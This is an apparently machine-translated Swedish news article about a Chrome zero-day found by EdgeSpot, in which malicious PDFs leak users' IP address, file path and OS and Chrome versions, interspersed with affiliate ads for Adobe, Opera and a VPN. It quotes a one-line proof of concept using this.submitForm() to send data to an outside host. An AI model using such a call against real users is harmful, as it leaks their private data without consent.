- EdgeSpot upptäckte en spännande nolldagars sårbarhet som utnyttjar PDF-dokument i Chrome.
- Detta sårbarhet kan skada dig genom att skörda känsliga data på din dator.
- Utforska våra Webb- & molnsida för mer insikt om andra verktyg och tjänster.
- Om du är intresserad av webbläsare ger vi mycket information om dem i vår Browsers Hub.
Gör alla dina dokument tillgängliga och säkra med Adobe Acrobat Reader. Detta dokumenthanteringsverktyg låter dig också e-signera och skapa officiella formulär för att spara tid på jobbet. Skaffa det till din dator så kan du:
- Öppna, skriv ut och redigera alla dina PDF-filer och andra filtyper
- Fyll i PDF-formulär lättare
- Håll dina viktiga dokument krypterade
Skaffa alla appar till ett specialpris!
Världens nr.1 dokumenthanteringsprogramvara är nu till ett bra pris så skynda dig!
Utnyttjandedetekteringstjänsten EdgeSpot upptäckte en spännande Krom nolldagars sårbarhet som utnyttjar PDF-dokument.
Sårbarheten tillåter angripare att skörda känsliga data med skadliga PDF-dokument som öppnats i Chrome.
Så snart offret öppnar respektive PDF-filer i Google Chrome börjar ett skadligt program arbeta i bakgrunden genom att samla in användardata.
Uppgifterna vidarebefordras sedan till fjärrservern som kontrolleras av hackarna. Du kanske undrar vilken data som sugs av angriparna, de riktar sig mot följande data på din dator:
- IP-adress
- Fullständig sökväg för PDF-filen på systemet
- OS- och Chrome-versioner
Akta dig för skadliga PDF-filer
Experter fick syn på att en av de två domänerna readnotify [.] com eller burpcollaborator [.] net fick uppgifterna.
De avslöjade att angriparna använder this.submitForm () PDF Javascript API för att samla in känslig information från användarna.
Vi testade det med en minimal PoC, ett enkelt API-samtal som this.submitForm (‘ http://google.com/test’) gör att Google Chrome skickar personuppgifterna till google.com.
Denna Chrome-bug utnyttjades av två distinkta uppsättningar skadliga PDF-filer, som båda cirkulerades i oktober 2017 respektive september 2018.
Speciellt kan insamlade data användas av angriparna för att finjustera attacker i framtiden. Rapporter tyder på att den första satsen filer sammanställdes med ReadNotifys PDF-spårningstjänst.
Användare kan använda tjänsten för att hålla reda på användarvyerna. EdgeSpot har inte delat några detaljer angående den andra uppsättningen PDF-filer.
Snabbtips: Ändra din webbläsare till Opera
I dessa oroliga tider attackeras vi med skadlig kod, nätfiske och trojaner i varje steg så vi måste vara mycket mer vaksamma och hålla oss skyddade.
Och eftersom detta är ett specifikt problem för Chrome kan du undvika det hotet och alla andra med en säkerhetsinriktad webbläsare som Opera.
Denna webbläsare levereras med en inbyggd annonsblockerare som inte bara rensar sådana distraktioner utan också blockerar analysskript, spårningspixlar och metoder för att samla in dina data.
Och om du vill vara helt säker på att du håller dig borta från någon fara, gå bakom den inbyggda VPN tjänst som är 100% gratis att använda under obegränsad tid.
Opera
Opera erbjuder det perfekta hotskyddet med den inbyggda ad-blockeraren och VPN-tjänsten gratis!
Besök webbplats
Hur kan jag hålla mig skyddad från PDF-sårbarheter?
Ladda ner Adobe Acrobat PRO
Adobe och Chrome matchar bra när det gäller hantering av PDF-filer. Genom att installera Adobe Extension för Chrome kan du granska och manipulera PDF-filer efter eget tycke utan att lämna din favoritwebbläsare.
Trots sin robusta struktur kan skadlig programvara som är gömd i PDF-filer kanske inte upptäckas om du använder standardversionen av Reader.
Den professionella versionen rekommenderas för att garantera ditt skydd och hålla dina data borta från hackare.
Även om det inte är gratis är priset du betalar ganska litet för den mängd extra funktioner du kommer att njuta av, inklusive den förbättrade säkerheten för dina PDF-filer.
Det ingår också en kostnadsfri provperiod på 7 dagar så att du kan få en smak av hela Pro-upplevelsen innan du köper.
Adobe Acrobat PRO
Håll dig borta från skadlig programvara genom att ladda ner Adobe Acrobat PRO. Den har mycket mer än den gratis versionen och håller dina data säkra.
Besök webbplats
Om du vill vara säker när du surfar på internet måste du få ett helt dedikerat verktyg för att säkra ditt nätverk. Installera privat internetåtkomst nu och säkra dig själv. Det skyddar din dator från attacker medan du surfar, maskerar din IP-adress och blockerar all oönskad åtkomst.
Exploitdetekteringstjänsten EdgeSpot ville varna Chrome-användarna om de potentiella riskerna eftersom plåstret inte förväntades släppas inom en snar framtid.
EdgeSpot rapporterade till Google om sårbarheten förra året och företaget lovade att släppa en patch i slutet av april.
Du kan dock överväga att använda en tillfällig lösning på problemet genom att lokalt visa de mottagna PDF-dokumenten med en annan läserapp.
Alternativt kan du också öppna dina PDF-dokument i Chrome genom att koppla bort dina system från Internet.
Vanliga frågor
Ja det gör det. Men om du vill ha ett bredare urval, utforska våra toppval för KromIntegritet tillägg i denna kompletta guide.
Thär är många tillägg som tillåter PDF-filer bearbetning. Kolla upp ut vår utmärkt guide om de bästa PDF-tilläggen för Chrome.
Det gör det inte men du kan aktivera det snabbt. Här är vår omfattande guide om hur du aktiverar QR-kodgeneratorn i Chrome.
![5 bästa gratis anti-keylogger-programvaran för din Windows-dator [2020-lista]](/f/1cddb65c49a80918c73c8c55a7b5f11a.jpg?width=300&height=460)
![De 3 bästa läkemedelsprogrammen att använda idag [2021 Guide]](/f/4726ae4a94b8fbe5b83696f8544a6778.jpg?width=300&height=460)